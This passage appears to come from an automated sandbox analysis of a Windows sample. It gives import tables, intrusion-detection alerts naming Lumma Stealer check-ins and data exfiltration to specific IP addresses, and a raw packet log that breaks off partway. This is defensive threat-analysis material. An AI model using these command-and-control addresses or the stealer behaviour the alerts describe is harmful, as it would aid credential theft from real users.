(The "Lotus worksheet" and "Targa image" types are libmagic guesses on tiny cursor structures and carry no meaning; the two RT_RCDATA entries typed as PE32+ and PE32 DLL are embedded executables and are worth extracting.)
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | AlphaBlend
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
shell32.dll | SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
ole32.dll | CoDisconnectObject
advapi32.dll | AdjustTokenPrivileges
oleaut32.dll | SysFreeString
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-07T14:37:11.659198+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:12.141741+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:12.141741+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:12.609952+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:13.061485+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:13.061485+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:13.913865+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:15.152429+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:16.395868+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:22.773652+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49754 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:24.415568+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:24.859758+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:26.047768+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:26.052786+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:28.145395+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:28.640242+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:29.414835+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 7, 2025 14:37:11.168333054 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:11.168380022 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:11.168493032 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:11.171468973 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:11.171484947 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:11.659068108 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:11.659198046 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:11.665258884 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:11.665275097 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:11.665540934 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:11.713156939 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:11.717955112 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:11.717983007 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:11.718099117 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.141786098 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.141906023 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.142030001 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.144071102 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.144094944 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.144115925 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.144121885 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.152410030 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.152465105 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.152559042 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.152854919 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.152864933 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.609733105 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.609951973 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.611422062 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.611443996 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.611681938 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:12.613076925 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.613126040 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:12.613157988 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.061485052 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.061542988 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.061582088 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.061611891 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.061619043 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.061650991 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.061671019 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.062031984 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.062088013 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.062098980 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.062314034 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.062350988 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.062364101 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.062371016 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.062459946 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.062467098 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.066183090 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.066243887 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.066251993 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.119429111 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.148682117 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.148752928 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.148781061 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.148864031 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.148886919 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.148935080 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.169214010 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.169333935 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.169403076 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.169619083 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.169636011 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.169660091 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.169665098 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4
Jan 7, 2025 14:37:13.442698956 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52
Jan 7, 2025 14:37:13.442750931 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.442848921 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.443205118 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.443212032 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.913685083 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.913865089 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.915172100 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.915182114 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.915381908 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.916640043 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.916810036 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.916826010 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:13.916882992 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:13.916887999 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.520318985 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.520423889 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.520539999 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.520746946 CET49750443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.520766973 CET44349750104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.665724993 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.665781975 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:14.665882111 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.666219950 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:14.666227102 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.152338028 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.152429104 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.153763056 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.153775930 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.154021978 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.155183077 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.155296087 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.155339956 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.629117966 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.629216909 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.629342079 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.629659891 CET49751443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.629682064 CET44349751104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.917972088 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.918025017 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:15.918101072 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.918910027 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:15.918926001 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.395775080 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.395868063 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.397279978 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.397290945 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.397551060 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.398639917 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.398781061 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.398811102 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:16.398874044 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:16.398881912 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:21.788935900 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:21.789031982 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:21.789160967 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:21.789366961 CET49752443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:21.789383888 CET44349752104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.303819895 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.303870916 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.303960085 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.304264069 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.304277897 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.773472071 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.773652077 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.775212049 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.775224924 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.775470972 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:22.776906967 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.777043104 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:22.777076006 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.549746037 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.549855947 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.549932003 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.595263004 CET49754443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.595335960 CET44349754104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.878432989 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.878473997 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:23.878544092 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.943556070 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:23.943584919 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.415503979 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.415568113 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.417109013 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.417119026 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.417362928 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.418783903 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.418927908 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.418932915 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.859766006 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.859910011 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:24.859961987 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.860280037 CET49755443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:24.860295057 CET44349755104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:25.576251984 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:25.576284885 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:25.576360941 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:25.576730967 CET49756443192.168.2.4104.21.25.52
